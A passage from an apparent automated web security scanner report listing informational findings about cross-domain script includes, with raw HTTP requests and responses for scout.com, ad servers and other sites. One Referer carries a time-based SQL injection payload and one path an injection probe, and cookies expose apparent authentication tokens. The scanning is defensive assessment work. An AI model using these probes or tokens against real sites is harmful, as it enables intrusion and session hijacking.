Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:06:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4181

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
25.11. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=125&slotname=8399079020&w=125&lmt=1304752004&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2F&dt=1304734003984&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247&correlator=1304734002949&frm=0&adk=539767575&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=782758865&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&eid=33895213&fu=0&ifi=2&dtd=520&gcv=gcm_8b3e97d1045ac48216d6355dac344a85.js HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:06:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10920

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
25.12. http://images.video.msn.com/js/ch/channels.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.video.msn.com
Path:   /js/ch/channels.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /js/ch/channels.js HTTP/1.1
Host: images.video.msn.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MSNRPSAuth=FAASARTFnW1j7R/2XIZB3mHe3d77E4hN8gNmAAAEgAAACBXYMoVREhyX0ADLEJLRiPILXfTnhyCvz9Go%2BL7ambo5dBf6RPTXNt11NoFy1AJuaoT0T2TxOAfGJcKG/wWHoMkWH3wqP/QN4jo1m7%2BNAdM3RHhQe8kiYltNKWPKkGejQZdl3uqmHRAAJQRYkMgp%2Bk0igKH1uU7%2BaR1w286L%2BYfi4CaaklOll/V2B7ivbPIflLPVJp/6vrubl9M4NrNx0QrX2G/gGs2ld4fHZkFuMyfd4%2BjMWtYCICZPYlmSFBwzjujFs8NWYS3WQmeL0gTh5CIQsx9kx17vsdPAFADz38T8NSgH2c2NxW8mM2p59qrjpw%3D%3D; MSNRPSShare=1; MSPAuth=9ZS6z9CnTHW6nQVLn69F5g6Kq1ZGc3ZrwOlg*roxIBmxDiYnXGxD!lZbQ3NaDTBICmclo916XIZmzbCt239s9!ofrljHmXARncTrTBhSXE5HYpO4CvzewYRcgboqrT6F63; MSPProf=9ng3Qj0dWDBgjckYbAydF4TeuPZIEqjRUAIQsjQC8bD7wSE7YcBkffxuAYa*5hFyfmsZw0z5iSAqmoJrRbBKbwEfaqa8N2YTDV8M*Hh!5oVibmYhBosajfilIcF947gI11Ahkt99*Z2rSzijfj!a0ur7*saIB9TO0cdTX34uzM5!JKmnlQDSL8Hw$$; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=TyTLJiYHPCovH3I7fPvWG8WWgxnFbQpamGFpO0Bcx8odiqKu6YYGUQ&W=1; Sample=37; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 02 Mar 2011 18:20:03 GMT
Accept-Ranges: bytes
ETag: "804bd8726d9cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:29:02 GMT
Connection: close
Cache-Control: max-age=86400,max-age=86400
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Content-Length: 3792

// new code should use embed.js; old code should be rewritten to use embed.js
Msn = window.Msn || {};
Msn.Video = window.Msn.Video = {};

// inject embed.js onto the page
if(document.createElemen
...[SNIP]...
);
script.setAttribute('type','text/javascript');
script.setAttribute('src',"http://img.widgets.video.s-msn.com/js/embed.js");
head.appendChild(script);
}
else
{
document.write('<script type="text/javascript" src= "http://img.widgets.video.s-msn.com/js/embed.js"></' + 'script>
...[SNIP]...
25.13. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/Linkbucks%20vlad%20modelS

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search/web/Linkbucks%20vlad%20modelS HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62775

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">
function showcheckbox()
{
if(document.getElementByI
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="http://ads.adonion.com/serve.php">
</script>
...[SNIP]...
25.14. http://nba.scout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nba.scout.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: nba.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.2.9.1304728228796

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:30:41 GMT
Content-Type: text/html
Content-Location: http://nba.scout.com/StaticPages/nba/index.html
Last-Modified: Fri, 06 May 2011 17:43:32 GMT
Accept-Ranges: bytes
ETag: "ec70541e15ccc1:68c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
Vary: Accept-Encoding
Content-Length: 25838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>NBA Team Directory Front Page</title>
<meta http-equiv="Con
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
25.15. http://recruiting.scout.com/Legacy/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /Legacy/a.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Legacy/a.z?s=143&p=26&cfg=22&fromprefetch=1 HTTP/1.1
Host: recruiting.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utmz=153805115.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=153805115.1232119317.1303509265.1303509265.1303516031.2; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304731683.1304736111.6; __utmc=202704078; __utmb=202704078.1.10.1304736111

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 21:42:14 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 21:52:13 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
25.16. http://scouthoops.scout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scouthoops.scout.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: scouthoops.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.2.9.1304728228796

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:30:36 GMT
Content-Type: text/html
Content-Location: http://scouthoops.scout.com/StaticPages/scouthoops/index.html
Last-Modified: Fri, 06 May 2011 17:40:15 GMT
Accept-Ranges: bytes
ETag: "789097a814ccc1:67b"
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 124213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
25.17. https://subscribe.haymarketmedia.com/scm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /scm/?form=paid HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lvsr30zwf1fkw5aao1zymfq2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:50:11 GMT
Content-Length: 114361


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
<div id="ctl00_MainContentPlaceHolder_TrustedSecure" style="float:right; margin-top:60px; margin-right:30px;">
<script language="JavaScript" src="https://www.csctrustedsecure.com/trustlogo/javascript/trustlogo.js" type="text/javascript"></script>
...[SNIP]...
25.18. http://tbe.taleo.net/NA9/ats/careers/jobSearch.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tbe.taleo.net
Path:   /NA9/ats/careers/jobSearch.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /NA9/ats/careers/jobSearch.jsp?org=BT&cws=1&__utma=1.2052460901.1304724283.1304724283.1304724283.1&__utmb=1.1.10.1304724283&__utmc=1&__utmx=-&__utmz=1.1304724283.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)&__utmv=-&__utmk=178642980 HTTP/1.1
Host: tbe.taleo.net
Proxy-Connection: keep-alive
Referer: http://www.btamericascareers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:24:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=69BC8F52CA8219FC1D3E62420D8128B6.NA9_primary_jvm; Path=/NA9/ats
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Content-Length: 27234


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHT
...[SNIP]...
</style><script src="https://www.linkedin.com/secure/companyInsider?script=&useBorder=yes" language="javascript"></script>
...[SNIP]...
25.19. http://www.advancedaccess.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedaccess.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.advancedaccess.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:47 GMT
Content-Type: text/html
Content-Location: http://www.advancedaccess.com/Index.html
Last-Modified: Fri, 18 Feb 2011 23:37:46 GMT
Accept-Ranges: bytes
ETag: "9446e9d8c4cfcb1:586"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
</script>
<script src="http://sniff.visistat.com/sniff.js" type="text/javascript"></script>
...[SNIP]...
25.20. http://www.advancedaccess.com/swf/swfobject.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedaccess.com
Path:   /swf/swfobject.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /swf/swfobject.js HTTP/1.1
Host: www.advancedaccess.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=157889130.; __utmxx=157889130.; __utmx_k_251695440=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 18:39:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQCTRCCR=MPAAIBGAIMAIDFIHHJCBFNKP; path=/
Cache-control: private
Content-Length: 19690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Real Estate Website Design, Internet Marketing - Advanced
...[SNIP]...
</SCRIPT>
   <SCRIPT SRC="http://sniff.visistat.com/sniff.js" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
25.21. http://www.agentadvantage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agentadvantage.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.agentadvantage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:50 GMT
Server: Apache/2.0.59 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html x
...[SNIP]...
<div id="ctcBox">
       
           <script language="javascript" src="http://www.dhmiservices.com/ClickContact/js.ashx?Agent=950b13d4-72fe-46ca-891d-8922b0525b3e&img=http%3A%2F%2Fwww.dhmiservices.com%2FImageHandler.ashx%3Fimg_id%3D3824" type="text/javascript"></script>
...[SNIP]...
25.22. http://www.caribbean-ocean.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:56:12 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Set-Cookie: PHPSESSID=tnd3bva6krhipm1j4ohktv3s79ifsgn9; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29224

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
</script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text/javascript"></script>
...[SNIP]...
25.23. http://www.caribbean-ocean.com/accommodation2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /accommodation2.php?id=8289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:34:52 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 19282

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
</script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text/javascript"></script>
...[SNIP]...
25.24. http://www.caribbean-ocean.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php HTTP/1.1
Pragma: no-cache
Host: www.caribbean-ocean.com
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:13 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Set-Cookie: PHPSESSID=qbm7qqtgmut5v5nuuf82f6kcafdj7gll; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 29224

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
</script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text/javascript"></script>
...[SNIP]...
25.25. http://www.caribbean-ocean.com/index.php/1'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /index.php/1'

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php/1' HTTP/1.1
Cookie: PHPSESSID=56e9tj63arfnmfkpi7rsto854a5vfekl
Host: www.caribbean-ocean.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:22 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 29224

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
</script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text/javascript"></script>
...[SNIP]...
25.26. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /luxury%20Barbados%20Resort%20holidays/91 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

